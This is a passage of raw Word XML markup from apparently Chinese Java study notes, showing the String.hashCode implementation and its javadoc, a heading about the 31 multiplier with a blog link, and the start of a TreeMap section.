    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * using &lt;code&gt;int&lt;/code&gt; arithmetic, where &lt;code&gt;s[i]&lt;/code&gt; is the</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * &lt;i&gt;i&lt;/i&gt;th character of the string, &lt;code&gt;n&lt;/code&gt; is the length of</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * the string, and &lt;code&gt;^&lt;/code&gt; indicates exponentiation.</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * (The hash value of the empty string is zero.)</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    *</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * @return  a hash code value for this object.</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    */</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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public</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> hashCode() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> h = hash;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> len = count;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (h == </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> &amp;&amp; len &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> off = offset;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> val[] = value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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for</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>; i &lt; len; i++) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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h = </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>*h + val[off++];  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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hash = h;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> h;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="00953D14" w:rsidP="000A1305">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6  HashCode</w:t>
      </w:r>
      <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>系数的问题</w:t>
      </w:r>
      <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/tayanxunhua/article/details/20525251</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="00DA54D7" w:rsidP="000A1305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="666666"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t xml:space="preserve">hashcode </w:t>
        </w:r>
        <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="666666"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>里面</w:t>
        </w:r>
        <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="666666"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="666666"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>使用</w:t>
        </w:r>
        <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="666666"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t xml:space="preserve">31 </w:t>
        </w:r>
        <w:r w:rsidR="000A1305" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="666666"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>系数的问题</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DE5C45" w:rsidRPr="00F41A4C" w:rsidRDefault="00DE5C45" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E066BF" w:rsidRPr="00F41A4C" w:rsidRDefault="00953D14" w:rsidP="00E066BF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00E066BF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  TreeMap</w:t>
      </w:r>
      <w:r w:rsidR="00034169" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00E066BF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SortMap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE59DF" w:rsidRPr="00BE59DF" w:rsidRDefault="00BE59DF" w:rsidP="00BE59DF">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.7.1 TreeMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E066BF" w:rsidRPr="00E20534" w:rsidRDefault="00802363" w:rsidP="00E066BF">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TreeMap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基于红黑树实现。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TreeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>没有调优选项，因为该树总处于平衡状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E066BF" w:rsidRDefault="00E20534" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
